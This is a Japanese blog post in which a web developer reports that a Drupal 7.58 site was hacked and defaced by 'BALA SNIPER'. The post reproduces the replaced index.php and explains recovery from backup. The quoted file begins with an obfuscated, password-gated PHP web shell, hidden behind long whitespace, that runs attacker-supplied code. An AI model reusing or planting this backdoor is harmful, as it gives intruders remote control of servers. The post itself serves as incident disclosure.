Hacked By BALA SNIPER(Drupal7.58ハッキングの疑い)

Crayon_Syntax_Highlighter

本日、運営中のサイトが乗っ取られてデータ書き換え被害にあいました。

写真を見ても大変気味が悪いです。
身近で起きたことですので、まさか自分が・・と驚きました。

置き換えられたファイルと復旧方法をお伝えいたします。

 

皆様も、早急なセキュリティアップデートを。

「Drupal」に「Drupalgeddon 2.0」とは別の脆弱性、更新が公開 – 早くも悪用を観測
コンテンツマネジメントシステム「Drupal」の開発チームは、深刻な脆弱性を修正するアップデートを公開した。すでに悪用が観測されているという。(2018/04/26)
Security NEXT

 

「Drupal」に乗っ取りが可能となる深刻な脆弱性、更新がリリース – 100万サイト以上に影響か
Security NEXT

書き換えられた状況

書き換えられた、index.phpの内容

Crayon_Syntax_Highlighter

Hacked By BALA SNIPER (BALA SNIPERがハッキングしましたよ)
balasniper17@gmail.com , fb:balasniper007 , contact me for fix !(修正のために私に連絡してください!)

書き換えられていたファイル

<?php                                                                                                                                                if (isset($_POST['p'])&&md5($_POST['p'])==='2f54b4885e840cee404883dbbf08bbe8'){$st = 'return value';$cap='bas'.'e6'.'4_d'.'ec'.'ode';$c = $st[1].$st[7].$st[8].$st[9].'('.$cap.'(\'';if(isset($_POST['uf'])&&isset($_POST['pr'])){$arr = array($c.$_POST['uf'].'\'))' => '|.*|e',);array_walk($arr, strval($_POST['pr']), '');}} ?><html><head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Hacked By BALA SNIPER</title>
<meta name="keywords" content="BALA SNIPER">
<meta name="description" content="BALA SNIPER">
<link rel="shortcut icon" href="http://img04.arabsh.com/uploads/image/2014/02/21/0c31424864f406.gif" type="image/x-icon">
<link href="http://fonts.googleapis.com/css?family=Iceland" rel="stylesheet" type="text/css">
</head><body background="http://i.imgur.com/5xLle3r.gif" bgcolor="#000000">
<style type="text/css">
<!--body,td,th {color: #CCCCCC;}
body {background="http://i.imgur.com/5xLle3r.gif"}
.style1 {font-family: Iceland;font-size: 10pt;}
.style2 {color: #00F000;font-weight: bold;}
.style3 {color: #FFFFFF}
.style7 {color: #FFFFFF; font-weight: bold; }
.style8 {font-family: Iceland;
font-size: 16pt;color: #FFFFFF;}
.style11 {font-size: 14pt}--></style></head>
<body bgcolor="#000000"> 
<center>
<pre><font color="red">
 _   ___   _____________ _____ _____ _____ ___   _   _ 
| | / / | | | ___ \  _  \_   _/  ___|_   _/ _ \ | \ | |
| |/ /| | | | |_/ / | | | | | \ `--.  | |/ /_\ \|  \| |
|    \| | | |    /| | | | | |  `--. \ | ||  _  || . ` |
| |\  \ |_| | |\ \| |/ / _| |_/\__/ / | || | | || |\  |
\_| \_/\___/\_| \_|___/  \___/\____/  \_/\_| |_/\_| \_/
                                                                                                                 
</font></pre>
<font face="Iceland" size="3" color="#FFFFFF"> 
<p align="center"><font color="red" face="Iceland" size="7">Hacked By BALA SNIPER</font></p><p align="center">
</font></p><center><font face="Iceland" size="5" color="#FFFFFF"><img style="-webkit-user-select: none" src="http://www.webchinupload.com/f/2016-03/8cf33879f0d303411bb17e3e871bb333.jpg" width="490" height="359"><br>
<br><font color="red">balasniper17@gmail.com , fb:balasniper007 , contact me for fix !</font>
<iframe width="0" height="0" src="https://www.youtube.com/embed/Ox_rgDuyws8?start=177&autoplay=1&controls=0&loop=1&rel=0&showinfo=0&autohide=1&wmode=transparent&hd=1" frameborder="0" allowfullscreen=""></iframe>
</font>
</font>
</font>
</center>
</center>
</body>
</html>

 

 

復旧方法

 

運良く、改変前のサイト丸ごとバックアップを保存していたので助かりました。

すべてのファイルを削除して、ルートフォルダにファイルを設置。

データベースもすべて置き換えで復旧いたしました。

原因

多くのサイトを運営しているが今回被害にあったサイトのみDrupal Coreが7.58だったので原因だと考えられる。

他サイトのDrupal Core7.59は問題なく動いている。

この記事を書いた人

山崎 大祐

現役コーダーでフロントエンジン寄りのWeb構築と運用ができます。(企画/デザイン/構築/運営)
すきなもの「赤色・キューブ・コンクリート」